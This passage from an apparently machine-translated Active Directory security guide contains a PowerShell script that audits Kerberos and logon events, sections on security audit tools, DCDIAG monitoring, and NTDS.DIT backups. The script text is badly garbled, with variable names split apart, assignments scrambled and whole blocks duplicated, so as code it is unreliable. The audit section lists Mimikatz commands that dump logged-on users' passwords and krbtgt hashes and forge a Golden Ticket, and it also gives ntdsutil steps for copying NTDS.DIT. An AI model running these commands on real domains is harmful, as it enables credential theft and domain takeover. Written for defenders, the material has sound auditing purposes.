") {$ status =" Failure - 0x11 - KDC Has No Support for transited kind "} elseif ($ Status -eq" 0x12 ") {$ Status = "Failure - 0x12 - Customers
credentials-have-been revoked (Account Could Be disabled, expired, locked)"}

elseif ($ Status -eq "0x13") {$ status = "Failure - 0x13 - Credentials for server-have-been revoked"} elseif ($ Status -eq "0x14") {$ status =
"Failure - 0x14 - TGT has-been revoked "} elseif ($ Status -eq" 0x15 ") {$ status =" Failure - 0x15 - Client not yet valid - try again later "} elseif
($ Status -eq" 0x16 ") {$ status =" Failure - 0x16 - Server not yet valid - try again later "} elseif ($ Status -eq" 0x17 ") {$ status =" Failure - 0x17 -
Password has expired "} elseif ($ Status -eq" 0x18 ") {$ Status =" Failure - 0x18 - Pre-authentication information Was invalid (bad password
specified Could Be) "}

elseif ($ Status -eq "0x19") {$ status = "Failure - 0x19 - Additional pre-authentication required"} elseif ($ Status -eq "0x1F") {$ status = "Failure
- 0x1F - Integrity check is decrypted field failed "} elseif ($ Status -eq" 0x20 ") {$ status =" Failure - 0x20 - Ticket expired (frequently logged by
computer accounts) "}

elseif ($ Status -eq "0x21") {$ status = "Failure - 0x21 - Ticket not yet valid"} elseif ($ Status -eq "0x22") {$ status = "Failure - 0x22 - Request
is a replay"} elseif ($ Status -eq "0x23") {$ status = "Failure - 0x23 - The ticket is not for us"} elseif ($ Status -eq "0x24") {$ status = "Failure -
0x24 - ticket and authenticator do not match "} elseif ($ Status -eq" 0x25 ") {$ status =" Failure - 0x25 - Clock skew too great (workstation
clock's too far out of sync with the DC's) "}

elseif ($ Status -eq "0x26") {$ status = "Failure - 0x26 - Incorrect net address"} elseif ($ Status -eq "0x27") {$ status =
"Failure - 0x27 - Protocol version mismatch"} elseif ( $ Status -eq "0x28") {$ status = "Failure - 0x28 - Invalid
msg-type"}

Msreport - Guillaume MATHIEU - All rights reserved


elseif ($ Status -eq "0x29") {$ status = "Failure - 0x29 - Message stream modified"} elseif ($ Status -eq "0x2A") {$ status = "Failure - 0x2A - Message
out of order"} elseif ($ Status -eq "0x2C") {$ status = "Failure - 0x2C - Version of Specified key is not available"} elseif ($ Status -eq "0x2D") {$ status =
"Failure - 0x2D - Service key not available "} elseif ($ Status -eq" 0x2E ") {$ status =" Failure - 0x2E - Mutual authentication failed "} elseif ($ Status -eq"
0x2F ") {$ status =" Failure - 0x2F - Incorrect management message "} elseif ($ Status -eq "0x30") {$ status = "Failure - 0x30 - Alternative
authentication method required"} elseif ($ Status -eq "0x31") {$ status = "Failure - 0x31 - Incorrect sequence number in message "} elseif ($ Status -eq"
0x32 ") {$ status =" Failure - 0x32 - Inappropriate kind of checksum in message "} elseif ($ Status -eq" 0x3C ") {$ Status = "Failure - 0x3C - Generic
error (described in e-text)"} elseif ($ Status -eq "0x3D") {$ status = "Failure - 0x3D - Field is too long for this implementation"} else {$ Status = "Failure -
other error"}Failure - 0x3D - Field is too long for this implementation "} else {$ Status =" Failure - other error "}Failure - 0x3D - Field is too long for this
implementation "} else {$ Status =" Failure - other error "}

# Writing the common result file to all ID


$ TableResultat.Add ( "$ DCEvent; $ status, $ Date, $ EventId; $ TargetUserName; $ TargetDomainName; $ rviceName If Kerberos ;; ;; $
IpAddress")

# Writing the result of the file ID 4768


$ TableResultat4768.Add ( "$ DCEvent; $ status, $ Date, $ EventId; $ TargetUserName; TargetDomainNam $ e, $ TargetSid; $ ServiceName;
$ ServiceSid; $ TicketOptions; $ Status; $ TicketEncryptionType; PreAuthTyp $ e, $ IpAddress; $ ipport; $ CertIssuerName; $
CertSerialNumber; $ CertThumbprint ")}}

# Analysis of the 4769 events (Kerberos authentication) elseif ($


xml.Event.System.EventID -eq 4769)
$ TableResultat4769.Add ( "$ DCEvent; $ status, $ Date, $ EventId; $ TargetUserName; TargetDomainNam $ e, $ ServiceName; $
ServiceSid; $ TicketOptions; $ TicketEncryptionType; $ IpAddress; $ ipport; $ LogonGuid; $ TransmittedServices") }}

# Analysis of the 4771 events (Kerberos authentication failure) elseif ($


xml.Event.System.EventID -eq 4771) {

$ = $ DCEvent XML.Event.System.Computer $ Status = $


XML.Event.EventData.Data. [4] '# text' $ date = $
xml.Event.System.TimeCreated.SystemTime $ EventId = $ xml.Event
.System.EventID
$ = $ TargetUserName XML.Event.EventData.Data [0]. '# Text' $ TargetSid = $
XML.Event.EventData.Data. [1] '# text' $ ServiceName = $
XML.Event.EventData.Data [ 2]. '# text' $ TicketOptions = $
XML.Event.EventData.Data. [3] '# text' $ PreAuthType = $
XML.Event.EventData.Data. [5] '# text' $ = $ IpAddress XML .Event.EventData.Data
[6]. '# text' $ $ XML.Event.EventData.Data ipport = [7]. '# text' $ $ = CertIssuerName
XML.Event.EventData.Data [8]. '# text '= $ CertSerialNumber $
XML.Event.EventData.Data. [9]' # text '$ CertThumbprint = $
XML.Event.EventData.Data. [10]' # text '

# Exclude computers account authentication events if (! ($


TargetUserName.Contains ( "$"))) {

# Analyze the error code / status


if ($ Status -eq "0x0") {$ Status = "Success - 0x0"}
elseif ($ Status -eq "0x1") {$ status = "Failure - 0x1 - Customer's entry in database has expired"} elseif ($ Status -eq "0x2") {$ status =
"Failure - 0x2 - Server's entry in database has expired "} elseif ($ Status -eq" 0x3 ") {$ status =" Failure - 0x3 - Requested protocol version
not supported # "} elseif ($ Status -eq" 0x4 ") {$ status =" Failure - 0x4 - Client's key encrypted in old master key "} elseif ($ Status -eq" 0x5
") {$ status =" Failure - 0x5 - Server's key encrypted in old master key "}

Msreport - Guillaume MATHIEU - All rights reserved


elseif ($ Status -eq "0x6") {$ status = "Failure - 0x6 - Client not found in Kerberos database"} elseif ($ Status -eq "0x7") {$ status = "Failure -
0x7 - Server not found in Kerberos database "} elseif ($ Status -eq" 0x8 ") {$ status =" Failure - 0x8 - Senior Multiple entries in database "}
elseif ($ Status -eq" 0x9 ") {$ status =" Failure - 0x9 - The customer or server has a null key "} elseif ($ Status -eq" 0xA ") {$ status =" Failure -
0xA - Ticket not eligible for postdating "} elseif ($ Status -eq" 0xB ") {$ status =" Failure - 0xB - Requested start time is later than end time "}
elseif ($ Status -eq" 0xC ") {$ status =" Failure - 0xC - KDC policy rejects request (Could Be workstation restrictions) "}

elseif ($ Status -eq "0xD") {$ status = "Failure - 0xD - KDC can not Accommodate requested option"} elseif ($ Status -eq "0xE") {$ status =
"Failure - 0xE - KDC Has No Support for encryption-type "} elseif ($ Status -eq" 0xF ") {$ status =" Failure - 0xF - KDC Has No Support for
checksum kind "} elseif ($ Status -eq" 0x10 ") {$ status =" Failure - 0x10 - KDC Has No Support for padata kind "} elseif ($ Status -eq" 0x11
") {$ status =" Failure - 0x11 - KDC Has No Support for transited kind "} elseif ($ Status -eq" 0x12 ") {$ Status = "Failure - 0x12 - Customers
credentials-have-been revoked (Account Could Be disabled, expired, locked)"}

elseif ($ Status -eq "0x13") {$ status = "Failure - 0x13 - Credentials for server-have-been revoked"} elseif ($ Status -eq "0x14") {$ status =
"Failure - 0x14 - TGT has-been revoked "} elseif ($ Status -eq" 0x15 ") {$ status =" Failure - 0x15 - Client not yet valid - try again later "} elseif
($ Status -eq" 0x16 ") {$ status =" Failure - 0x16 - Server not yet valid - try again later "} elseif ($ Status -eq" 0x17 ") {$ status =" Failure - 0x17 -
Password has expired "} elseif ($ Status -eq" 0x18 ") {$ Status =" Failure - 0x18 - Pre-authentication information Was invalid (bad password
specified Could Be) "}

elseif ($ Status -eq "0x19") {$ status = "Failure - 0x19 - Additional pre-authentication required"} elseif ($ Status -eq "0x1F") {$ status = "Failure
- 0x1F - Integrity check is decrypted field failed "} elseif ($ Status -eq" 0x20 ") {$ status =" Failure - 0x20 - Ticket expired (frequently logged by
computer accounts) "}

elseif ($ Status -eq "0x21") {$ status = "Failure - 0x21 - Ticket not yet valid"} elseif ($ Status -eq "0x22") {$ status = "Failure - 0x22 - Request
is a replay"} elseif ($ Status -eq "0x23") {$ status = "Failure - 0x23 - The ticket is not for us"} elseif ($ Status -eq "0x24") {$ status = "Failure -
0x24 - ticket and authenticator do not match "} elseif ($ Status -eq" 0x25 ") {$ status =" Failure - 0x25 - Clock skew too great (workstation
clock's too far out of sync with the DC's) "}

elseif ($ Status -eq "0x26") {$ status = "Failure - 0x26 - Incorrect net address"} elseif ($ Status -eq "0x27") {$ status = "Failure - 0x27 - Protocol version mismatch"} elseif ( $ Status -eq

"0x28") {$ status = "Failure - 0x28 - Invalid msg-type"} elseif ($ Status -eq "0x29") {$ status = "Failure - 0x29 - Message stream modified"} elseif ($ Status -eq "0x2A") {$ status = "Failure -

0x2A - Message out of order"} elseif ($ Status -eq "0x2C") {$ status = "Failure - 0x2C - Version of Specified key is not available"} elseif ($ Status -eq "0x2D") {$ status = "Failure - 0x2D -

Service key not available"} elseif ($ Status -eq "0x2E") {$ status = "Failure - 0x2E - Mutual authentication failed"} Elseif ($ Status -eq "0x2F") {$ status = "Failure - 0x2F - Wrong Message

direction"} elseif ($ Status -eq "0x30") {$ status = "Failure - 0x30 - Alternative authentication method required"} elseif ($ Status -eq "0x31") {$ status = "Failure - 0x31 - Incorrect sequence

number in message"} elseif ($ Status -eq "0x32") {$ status = "Failure - 0x32 - Inappropriate kind of checksum in message "} elseif ($ Status -eq" 0x3C ") {$ status =" Failure - 0x3C - Generic

error (described in e-text) "} elseif ($ Status -eq" 0x3D ") {$ status =" Failure - 0x3D - Field is too long for this implementation "} else {$ Status =" Failure - other error "}Failure - 0x2F - Wrong

Message direction "} elseif ($ Status -eq" 0x30 ") {$ status =" Failure - 0x30 - Alternative authentication method required "} elseif ($ Status -eq" 0x31 ") {$ Status =" Failure - 0x31 - Incorrect

sequence number in message "} elseif ($ Status -eq" 0x32 ") {$ status =" Failure - 0x32 - Inappropriate kind of checksum in message "} elseif ($ Status -eq" 0x3C ") {$ Status = "Failure -

0x3C - Generic error (described in e-text)"} elseif ($ Status -eq "0x3D") {$ status = "Failure - 0x3D - Field is too long for this implementation"} else {$ Status = "Failure - other error"}Failure -

0x2F - Wrong Message direction "} elseif ($ Status -eq" 0x30 ") {$ status =" Failure - 0x30 - Alternative authentication method required "} elseif ($ Status -eq" 0x31 ") {$ Status =" Failure -

0x31 - Incorrect sequence number in message "} elseif ($ Status -eq" 0x32 ") {$ status =" Failure - 0x32 - Inappropriate kind of checksum in message "} elseif ($ Status -eq" 0x3C ") {$

Status = "Failure - 0x3C - Generic error (described in e-text)"} elseif ($ Status -eq "0x3D") {$ status = "Failure - 0x3D - Field is too long for this implementation"} else {$ Status = "Failure -

other error"}} Elseif ($ Status -eq "0x31") {$ status = "Failure - 0x31 - Incorrect sequence number in message"} elseif ($ Status -eq "0x32") {$ status = "Failure - 0x32 - Inappropriate kind of

checksum in message "} elseif ($ Status -eq" 0x3C ") {$ status =" Failure - 0x3C - Generic error (described in e-text) "} elseif ($ Status -eq" 0x3D ") {$ Status =" Failure - 0x3D - Field is too long for this implementation "} els

# Writing the common result file to all ID


$ TableResultat.Add ( "$ DCEvent; $ status, $ Date, $ EventId; $ TargetUserName $ ServiceName ;; ;; ;; Kerberos $ IpAddress")

# Writing the result of the file ID 4771


$ TableResultat4771.Add ( "$ DCEvent; $ status, $ Date, $ EventId; $ TargetUserName; $ TargetSid; $ service name; $ TicketOptions; $
PreAuthType; $ IpAddress; $ ipport; $ CertIssuerName; $ CertSerialNumber; $ Cert Thumbprint" )}}

# Analysis of the 4648 events (LDAP Bind Single)

Msreport - Guillaume MATHIEU - All rights reserved


elseif ($ xml.Event.System.EventID -eq 4648) {

$ = $ DCEvent XML.Event.System.Computer $ Status = $


XML.Event.System.Keywords
if ($ Status -eq "0x8020000000000000") {$ Status = "Success Audit"} = $ $ Date $
xml.Event.System.TimeCreated.SystemTime EventId = $ xml.Event.System.EventID

$ = $ SubjectUserSid XML.Event.EventData.Data [0]. '# Text' $ SubjectUserName = $


XML.Event.EventData.Data. [1] '# text' $ SubjectDomainName = $
XML.Event.EventData.Data [ 2]. '# text' $ SubjectLogonId = $
XML.Event.EventData.Data. [3] '# text' $ LogonGuid = $ XML.Event.EventData.Data. [4]
'# text' $ = $ TargetUserName XML .Event.EventData.Data. [5] '# text' $
TargetDomainName = $ XML.Event.EventData.Data. [6] '# text' $ TargetLogonGuid = $
XML.Event.EventData.Data [7]. '# text '= $ targetServerName $
XML.Event.EventData.Data. [8]' # text '$ TargetInfo = $ XML.Event.EventData.Data. [9]'
# text '$ ProcessName = $ XML.Event.EventData. Data [11]. '# text' $ IpAddress = $
XML.Event.EventData.Data. [12] '# text' $ ipport = $ XML.Event.EventData.Data. [13] '#
text'

# Exclude computers account authentication events if (! ($


TargetUserName.Contains ( "$"))) {

# Writing the common result file to all ID


$ TableResultat.Add ( "$ DCEvent; $ status, $ Date, $ EventId; $ TargetUserName; $ TargetDomainName; $ Ta rgetServerName ;; Simple
LDAP Bind or others ;; $ IpAddress")

# Writing the result of the file ID 4648


$ TableResultat4648.Add ( "$ DCEvent; $ status, $ Date, $ EventId; $ SubjectUserSid; $ SubjectUserName; S $ ubjectDomainName; $
SubjectLogonId; $ LogonGuid; $ TargetUserName; $ TargetDomainName; $ TargetL ogonGuid; $ targetServerName; $ TargetInfo; $
ProcessId; $ ProcessName; $ IpAddress; $ ipport ")}}

# Writing block lines of the common result file


# Switching to a new file if it exceeds the maximum size if ((($ TableResultat.Count)% $
EcritureNbLigne) -eq 0) {

if ((Get-Item $ -Path Result) .length -gt $ MaxResultatSize) {

Result = $ $ $ DossierTravail + DC + "- AuditConnection Announcements" $ + Index + "-" + $ DateReference.Year + "-" + $


DateReference.Month + "-" + $ DateReference.Day + "_" + $ DateReference.Hour + "-" + $ DateReference.Minute + "-" + $ +
DateReference.Second ".csv" $ index ++}

$ TableResultat | Out-File $ Result -Append Clear-Variable


TableResultat
$ TableResultat = New-Object System.Collections.Generic.List [string]}

# Writing results by file line block for 4776 ID if ((($ TableResultat4776.Count)% $


EcritureNbLigne) -eq 0) {

if ((Get-Item -Path $ Resultat4776) .length -gt $ MaxResultatSize) {

$ Resultat4776 DossierTravail = $ + $ + DC "- AuditConnection_ID4776 Announcements" + $ Index4776 + "-" + $


DateReference.Year + "-" + $ DateReference.Month + "-" + $ DateReference.Day + "_" + $ DateReference.Hour + "-" + $
DateReference.Minute + "-" + $ + DateReference.Second ".csv" $ Index4776 ++}

Msreport - Guillaume MATHIEU - All rights reserved


$ TableResultat4776 | Out-File $ Resultat4776 -Append Clear-Variable
TableResultat4776
$ TableResultat4776 = New-Object System.Collections.Generic.List [string]}

# Writing results by file line block for 4768 ID if ((($ TableResultat4768.Count)% $


EcritureNbLigne) -eq 0) {

if ((Get-Item -Path $ Resultat4768) .length -gt $ MaxResultatSize) {

$ Resultat4768 DossierTravail = $ + $ + DC "- AuditConnection_ID4768 Announcements" + $ Index4768 + "-" + $


DateReference.Year + "-" + $ DateReference.Month + "-" + $ DateReference.Day + "_" + $ DateReference.Hour + "-" + $
DateReference.Minute + "-" + $ + DateReference.Second ".csv" $ Index4768 ++}

$ TableResultat4768 | Out-File $ Resultat4768 -Append Clear-Variable


TableResultat4768
$ TableResultat4768 = New-Object System.Collections.Generic.List [string]}

# Writing results by file line block for 4769 ID if ((($ TableResultat4769.Count)% $


EcritureNbLigne) -eq 0) {

if ((Get-Item -Path $ Resultat4769) .length -gt $ MaxResultatSize) {

$ Resultat4769 DossierTravail = $ + $ + DC "- AuditConnection_ID4769 Announcements" + $ Index4769 + "-" + $


DateReference.Year + "-" + $ DateReference.Month + "-" + $ DateReference.Day + "_" + $ DateReference.Hour + "-" + $
DateReference.Minute + "-" + $ + DateReference.Second ".csv" $ Index4769 ++}

$ TableResultat4769 | Out-File $ Resultat4769 -Append Clear-Variable


TableResultat4769
$ TableResultat4769 = New-Object System.Collections.Generic.List [string]}

# Writing results by file line block for 4771 ID if ((($ TableResultat4771.Count)% $


EcritureNbLigne) -eq 0) {

if ((Get-Item -Path $ Resultat4771) .length -gt $ MaxResultatSize) {

$ Resultat4771 DossierTravail = $ + $ + DC "- AuditConnection_ID4771 Announcements" + $ Index4771 + "-" + $


DateReference.Year + "-" + $ DateReference.Month + "-" + $ DateReference.Day + "_" + $ DateReference.Hour + "-" + $
DateReference.Minute + "-" + $ + DateReference.Second ".csv" $ Index4771 ++}

$ TableResultat4771 | Out-File $ Resultat4771 -Append Clear-Variable


TableResultat4771
$ TableResultat4771 = New-Object System.Collections.Generic.List [string]}

# Writing results by file line block for 4624 ID if ((($ TableResultat4624.Count)% $


EcritureNbLigne) -eq 0) {

if ((Get-Item -Path $ Resultat4624) .length -gt $ MaxResultatSize) {

$ Resultat4624 DossierTravail = $ + $ + DC "- AuditConnection_ID4624 Announcements" + $ Index4624 + "-" + $


DateReference.Year + "-" + $ DateReference.Month + "-" + $ DateReference.Day + "_" + $ DateReference.Hour + "-" + $
DateReference.Minute + "-" + $ + DateReference.Second ".csv" $ Index4624 ++}

Msreport - Guillaume MATHIEU - All rights reserved


$ TableResultat4624 | Out-File $ Resultat4624 -Append Clear-Variable
TableResultat4624
$ TableResultat4624 = New-Object System.Collections.Generic.List [string]}

# Writing results by file line block for 4625 ID if ((($ TableResultat4625.Count)% $


EcritureNbLigne) -eq 0) {

if ((Get-Item -Path $ Resultat4625) .length -gt $ MaxResultatSize) {

$ Resultat4625 DossierTravail = $ + $ + DC "- AuditConnection_ID4625 Announcements" + $ Index4625 + "-" + $


DateReference.Year + "-" + $ DateReference.Month + "-" + $ DateReference.Day + "_" + $ DateReference.Hour + "-" + $
DateReference.Minute + "-" + $ + DateReference.Second ".csv" $ Index4625 ++}

$ TableResultat4625 | Out-File $ Resultat4625 -Append Clear-Variable


TableResultat4625
$ TableResultat4625 = New-Object System.Collections.Generic.List [string]}

# Writing results by file line block for 4648 ID if ((($ TableResultat4648.Count)% $


EcritureNbLigne) -eq 0) {

if ((Get-Item -Path $ Resultat4648) .length -gt $ MaxResultatSize) {

$ Resultat4648 DossierTravail = $ + $ + DC "- AuditConnection_ID4648 Announcements" + $ Index4648 + "-" + $


DateReference.Year + "-" + $ DateReference.Month + "-" + $ DateReference.Day + "_" + $ DateReference.Hour + "-" + $
DateReference.Minute + "-" + $ + DateReference.Second ".csv" $ Index4648 ++}

$ TableResultat4648 | Out-File $ Resultat4648 -Append Clear-Variable


TableResultat4648
$ TableResultat4648 = New-Object System.Collections.Generic.List [string]}}

# Writing final result files $ TableResultat | Out-File $ Result -Append $


TableResultat4776 | Out-File $ Resultat4776 -Append $ TableResultat4768 |
Out-File $ Resultat4768 -Append $ TableResultat4769 | Out-File $
Resultat4769 -Append $ TableResultat4771 | Out-File $ Resultat4771
-Append $ TableResultat4624 | Out-File $ Resultat4624 -Append $
TableResultat4625 | Out-File $ Resultat4625 -Append $ TableResultat4648 |
Out-File $ Resultat4648 -Append

# Creation of the zip file


Write-Host "Creating zip file"
[Reflection.Assembly] :: LoadWithPartialName ( "System.IO.Compression.FileSystem") = $ CompressionLevel
[System.IO.Compression.CompressionLevel] :: Optimal
[System.IO.Compression.ZipFile] :: CreateFromDirectory ($ DossierTravail, $ ResultatZip, $ compressionLe vel, $ false)

# Analysis of the file size


if (((Get-Item -Path $ ResultatZip) .Length) -the $ MaxResultatZipSize) {

# Send an email with the attachment. $ Format =


"<style>"
$ Format = Format $ + "</ style>"

Msreport - Guillaume MATHIEU - All rights reserved


$ Body = "<P> Hello </ P>"
Body Body = $ $ + "<P> The attached report on users who are connected to the domain controller $ DC. </ P>"

$ $ Body = Body + "<P> Regards </ P>"


$ $ Body = Body + "<P> The IT team Msreport </ P>" $ ratio = ConvertTo-Html Title -Title -Body
$ $ $ Body -head Format
Send-MailMessage $ -To To -subject "Audit successful authentication requests and failed on $ CD" -Body "$ Report" -SmtpServer $
SMTPServer -From From $ -BodyAsHtml -Encoding ([System.Text.Encoding] :: UTF8) -Attachments $ ResultatZip} else {

# Send an email without the attachment with a link to download the result file $ format = "<style>"

$ = $ + Format Format "</ style>" $ Body =


"<P> Hello </ P>"
$ Body = $ Body + "<P> Enclosed the link to the report on users who are connected to the domain controller $ DC. </ P>" $ Body = $ Body
+ "<P> $ ResultatZipLink < / P> "$ Body = Body + $" <P> Regards </ P> "

$ $ Body = Body + "<P> The IT team Msreport </ P>" $ ratio = ConvertTo-Html Title -Title -Body
$ $ $ Body -head Format
Send-MailMessage $ -To To -subject "Audit successful authentication requests and failed on $ CD" -Body "$ Report" -SmtpServer $
SMTPServer -From From $ -BodyAsHtml -Encoding ([System.Text.Encoding] :: UTF8)}

# Deleting the working folder and EVTX file if ((Test-Path $ DossierTravail)


-eq $ True) {

Remove-Item $ DossierTravail -Recurse -Force: $ True Remove-Item $


EventFile -Force}

Msreport - Guillaume MATHIEU - All rights reserved


7.3 Audit the Security YOUR DIRECTORY

There are many tools to assess the security level of your directory and perform a security audit of the Active Directory (penetration testing).

• Mimikatz: this tool can display clear the password of all users connected to a machine. It can also generate Golden Ticket (Kerberos
attack Pass The Ticket). The tool is free and is available online: http://blog.gentilkiwi.com/mimikatz

To display the login / password of all users connected to a machine:


:: debug privilege
:: full sekurlsa logonpasswords

To generate a Golden Ticket:

Prerequisite 1: Finding the SID field with the command whoami / user .

Prerequisite 2: Find the NTHASH Account krbtgt .


:: :: debug privilege
sekurlsa krbtgt

then run the command:


:: debug privilege

Msreport - Guillaume MATHIEU - All rights reserved


Kerberos :: golden / admin: darkguigui /domain:msreport33.intra / id: 4000 / sid: S-1-5-21-5951273541458299726-2062179204 / krbtgt:
c4140df5b2ec6aaf0cb5d19b8cb4313b / startOffset: 0 / endin: 600 / renewmax: 10080 / ptt

A video demonstration of the Golden Ticket generation procedure is available at:

https://experiences.microsoft.fr/Video/avec-laps-metsys-premunit-un-si-dattaques-par-elevationde-privileges/fd1a804d-c21d-4bbe-97d7-1697364fe5b5#EDHCo

• Kali (Formerly BackTrack) this tool has many tools


( http://tools.kali.org/tools-listing). to perform penetration tests on domain controllers. The tool is free and can be downloaded at: https://www.kali.org/

• Metasploit: is the reference tool. It incorporates many exploits that perform elevations privileges or generate a failure of a Windows
machine. A basic version of the tool is free and can be downloaded at:

http://www.rapid7.com/products/metasploit/download.jsp

• BTA: this tool provided by ANSSI. I invite you to read the following documents on BTA:
http://www.information-security.fr/audit-lactive-directory-bta/
https://www.sstic.org/media/SSTIC2014/SSTIC-
acts / BTA_Analyse_de_la_securite_Active_Directory /
SSTIC2014-ArticleBTA_Analyse_de_la_securite_Active_Directory-czarny_biondi.pdf
https://www.sstic.org/2014/presentation/BTA_Analyse_de_la_securite_Active_Directory/

• ADRAP: This tool is provided by Microsoft. This is a comprehensive audit covering all the risks associated with Active Directory. ADRAP
allows for example to detect the Active Directory configuration issues that might result in failure as the risks in terms of security.

7.4 SUPERVISION YOUR DIRECTORY ACTIVE DIRECTORY

It is necessary to monitor Active Directory to identify potential failures generated by an attack. The solution below is based on a PowerShell
script that analyzes the output of the command DCDIAG / V / E, which is run from a single server. The script must be installed on a Windows
Server 2008 R2 (or later) English because the command DCDIAG

must produce an outcome in English. Note: the download version of DCDIAG English works only on Windows

2003. It does not support such replication SYSVOL folder with the DFS-R engine.
For more information see http://www.microsoft.com/en-
us / download / Details.aspx? id = 31063
Therefore you must install an English domain member server to oversee domain controllers installed with a French Windows.

Msreport - Guillaume MATHIEU - All rights reserved


7.4.1 P RESENTATION TOOL DCDIAG

This is an Active Directory diagnostic tool that allows comprehensive checking the availability of domain controllers, the proper functioning of
replication, availability FSMO roles, that the services are started ...

The / V allows to work in verbose mode.


The / E option to query all domain controllers in the forest.
There are other options to perform DNS tests. For more information, type the command
DCDIAG.EXE /?

7.4.2 D EPLOYING SOLUTION

7.4.2.1 Step 1: preparation of the server

Install a Member Server Windows 2008 R2 / Windows 2012 English . The script only works for English DCDIAG. Launch Server Manager and
click Add Features.
Add functionality AD DS Snap-Ins and Command-Line Tools in Remote Server Administration Tools | AD DS and AD LDS Tools | AD DS
Tools.

7.4.2.2 Step 2: allow execution of unsigned PowerShell scripts

Enter the following command to allow the execution of unsigned scripts (or better to sign the code of the script): Set-ExecutionPolicy
Unrestricted

7.4.2.3 Step 3: Create the script c: \ _ adm \ supervisory \ supervision.ps1

Copy the code available at this address http://msreport.free.fr/articles/supervision.txt


# Objectives of the script
# Analyze the result of the command DCDIAG / V / W and produces four output files.
# The script must be run on an English version of Windows.
# Initialization files to the default. $ Connectivity = "OK" $
Configuration = "OK" $ Sysvol = "OK" $ NTDS = "OK"

# Storage DCDIAG result in a variable


# In the example below the script connects to the FR56DC2K12 domain controller. To change !

$ Dcdiagresu = dcdiag / v / e / s: FR56DC2k12


# Analysis of the contents of the variable foreach
($ line in $ dcdiagresu) {

# Test availability of directory


if (($ line.Contains ( "failed test Connectivity")) -or ($ line.Contains ( "failed test services"))) {

$ Connectivity = "KO"}

# Testing Active Directory configuration


if (($ line.Contains ( "failed test KnowsOfRoleHolders")) -or ($ line.Contains ( "failed test MachineAccount")) -or ($ line.Contains (
"failed test Advertising")) -or ($ line .Contains ( "failed test RidManager")) -or ($ line.Contains ( "failed test LocatorCheck")))

{
$ Configuration = "KO"}

# Testing the Sysvol replication


if (($ line.Contains ( "failed test DFSREvent")) -or ($ line.Contains ( "failed test SysVolCheck")) -or ($ line.Contains ( "failed test
KccEvent")) -or ($ line .Contains ( "failed test NetLogons")) -or ($ line.Contains ( "failed test NCSecDesc")))

{
$ Sysvol = "KO"}

Msreport - Guillaume MATHIEU - All rights reserved


# Testing the NTDS Replication
if (($ line.Contains ( "failed test ObjectsReplicated")) -or ($ line.Contains ( "failed test Replications")) -or ($ line.Contains ( "failed test
Intersite")))
{
$ NTDS = "KO"}}

# Writing results files


$ Connectivity | Out-File c: \ Connectivity.txt -Force $ Configuration |
Out-File c: \ configuration.txt -Force $ Sysvol | Out-File c: \ Sysvol.txt
-Force $ NTDS | Out-File c: \ NTDS.txt -Force

7.4.2.4 Step 4: Configure your management application (like Nagios)

Configure your management application (like Nagios) for reading the 4 files results and display a warning depending on the contents of each
file: okay or KO.

7.5 HAVE A PLAN REPEAT DATA (PRI) ACTIVE DIRECTORY

If the security compromise of your Active Directory, Microsoft recommends performing a restore by scenario Forest Recovery. This type of
restoration is very impacting for production because it needs to stop all pre domain controllers. The fact test this procedure to limit the
downtime of the directory so the impact on the business. Test at least once every 6 months, the procedure Forest Recovery

a model of environmental copy of the production environment. The procedure for Forest Recovery from Microsoft is available
at this address (Appendix A).
http://technet.microsoft.com/fr-fr/library/planning-active-directory-forest-recovery(v=ws.10).aspx

7.6 PROTECT YOUR BACKUP AND ACTIVE DIRECTORY FILES MFIs (INSTALL FROM MEDIA)

Windows Server Backup is the integrated tool in Windows Server 2008 R1 and later. It can perform a full backup (Image BareMetal) a domain
controller and generates a file VHD VHDX or (depending on the version of Windows). It allows to easily restore a domain controller (with
BareMetal backup) by booting from the Windows installation DVD and selecting the option Repair computer. If an attacker manages to copy a
backup directory, it will probably restore the domain controller, get the files NTDS.DIT

and SYSTEM then apply the above methodology to have administrative access to the domain controller ( cmd.exe copied and renamed sethc.exe).
It will also try to recover the passwords for all user accounts and computer accounts from LMHash or NTHASH.

The tool Ntdsutil allows a domain administrator (and other group with privilege) to create a media IFM. This type of media allows you to install a
new domain controller without replicate the contents of the directory through the network. It contains an offline copy file connection NTDS.DIT,

SYSTEM (hive HKEY_LOCAL_MACHINE \ SYSTEM the registry). To generate an IFM, use the following procedure:

Ntdsutil ifm

activate instance ntds create


full C: \ ifm \

The tool Ntdsutil also allows a user with privileges to create the Active Directory snapshot using the following procedure: Open a command
prompt and type the following commands:

ntdsutil
snapshot
activate instance ntds create

Msreport - Guillaume MATHIEU - All rights reserved


type the following command:
Mount ID_snapshot

The administrator can now copy / paste files NTDS.DIT and SYSTEM which are no longer protected by the system.

It can then dismount and delete the snapshot by typing the following commands:
list all
Unmount} {ID_SNAPSHOT Delete}
{ID_SNAPSHOT

Msreport - Guillaume MATHIEU - All rights reserved To mount the snapshot generated,
8 NOTES
8.1 DEPLOYMENT PROCEDURE FOR MICROSOFT CERTIFICATION AUTHORITY

launch the Server Manager on a Windows 2012 R2 machines domain member with a member of the group account Enterprise Admins and follow
the procedure below.

Msreport - Guillaume MATHIEU - All rights reserved


Msreport - Guillaume MATHIEU - All rights reserved
Msreport - Guillaume MATHIEU - All rights reserved
The above deployed PKI integrates a basic configuration. Some additional configuration steps are required as the configuration of the AIA / CRL
to be hosted on a website, the configuration of the maximum lifetime of a certificate (maximum 2 years by default), the setting of the model
certificates (deployment of certificates, lifetime), certificate revocation settings (generation CRL hourly CRL URL in the certificates), enabling the
separation of roles or the implementation of the archiving private keys of certificates.

All these steps are explained in the following article: http://msreport.free.fr/?p=451 .

8.2 ACTIVATION PROCEDURE BitLocker on a DOMAIN CONTROLLER

8.2.1 P RESENTATION SOLUTION FOR COSTING THE HARD DRIVE CONTROLLERS


FIELD

BitLocker to encrypt the system drive, a fixed disk (non-system) or a removable disk (USB key ...). BitLocker is included as a feature in
Windows 2008 R2 and later.

BitLocker automatically creates two partitions: a 100MB partition that is marked active and contains the boot files and the system partition that
contains the system data (C: \ windows). Only the system partition is encrypted. The solution BitLocker can use different devices to store the
encryption / decryption key:

• A USB key (ignition key only): This method only figure the reader. It does not provide validation of the components of the boot sequence
and no guarantee against tampering of equipment. To use this method, your computer must support reading USB devices in the preboot
environment.

• A smart card: BitLocker is then based on the certificate from the smart card to encrypt / decrypt the hard drive.

• TPM ( Trusted Platform Module). This is the method recommended by Microsoft. It helps protect the hard drive and validate that the
components of the starting sequence has not been altered.

Msreport - Guillaume MATHIEU - All rights reserved


8.2.2 M MPLEMENTATION OF THE B IT OCKER ON DOMAIN CONTROLLERS W INDOWS 2012 R2

All information below is taken from Microsoft following documents:


